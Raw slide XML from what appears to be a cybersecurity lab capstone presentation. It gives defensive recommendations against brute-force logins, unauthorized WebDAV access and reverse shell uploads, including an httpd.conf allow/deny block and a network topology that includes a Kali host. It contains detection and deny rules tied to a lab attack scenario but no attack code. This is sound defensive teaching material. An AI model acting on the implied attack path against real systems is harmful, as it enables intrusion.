              <a:t>Additionally, since it seems Ashton is the only one managing the secret_folder/, it would make sense to have an alarm set that would create an alert and log anytime a successful login (indicated by OK (200) response) is triggered by an IP address other than Ashton’s.  Similar alerts could be set for other sensitive files or directories, such as the WebDav folder. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Google Shape;430;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The easiest way to prevent brute force attacks is to implement an account lockout after 5 or more failed login attempts. However, depending on how many accounts an attacker is attempting to brute force their way into, this could cause other administrative obstacles if admins need to continuously unlock people’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> to continue operations. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>A slightly better option would be to add an arbitrary amount of time between password entry and password authentication, known as Password Authentication Delay. Adding just a few seconds between each entry and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> can greatly delay the progress of a brute force attack, giving defenders more time to respond. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Other options could include:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-290830" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Using CAPTCHAS for login</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-290830" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Implementing Security Questions</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-290830" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Having a strong password policy </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="120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Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;p41"/>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437" name="Google Shape;437;p41"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>If only certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>people require access to the WebDAV directory, then it would be prudent to block all IPs from accessing the directory and then whitelisting only the IPs that require access (such as Ryan). </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Then, you could set an alarm that would go off anytime an untrusted IP address attempts to access the WebDAV folder. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Google Shape;438;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>To block all IPs and whitelist trusted IPs, the httpd.conf file on the host machine would need to be updated to the following:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>&lt;Directory /var/www/webdav/&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>	Order allow,deny</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>	Allow from 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>	Allow from 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>	Allow from [Insert Ryan’s IP address]</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>	Deny from all</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="12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Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p42"/>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445" name="Google Shape;445;p42"/>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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>To identify reverse shell uploads, an alarm could be set to go off anytime a “put” request is made to a protected folder, such as WebDAV, from an unknown IP.  The alarm would trigger an email alert and log the details of the incident. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Google Shape;446;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>To block or prevent file uploads there are a variety of steps an organization can take, such as implementing File Type Verification for uploads, restricting specific file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>extensions, using Anti-Malware tools to scan uploads, and storing files in an external directory, separate from the webroot.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;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2425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p22"/>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22" name="Google Shape;222;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7037250" y="627325"/>
            <a:ext cx="1902000" cy="4289400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="45818E"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Range:  192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Netmask: 255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>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91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Hostname: Kali</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Hostname: ELK</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100"/>
              <a:t>Hostname: ML-RefVM-684427</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
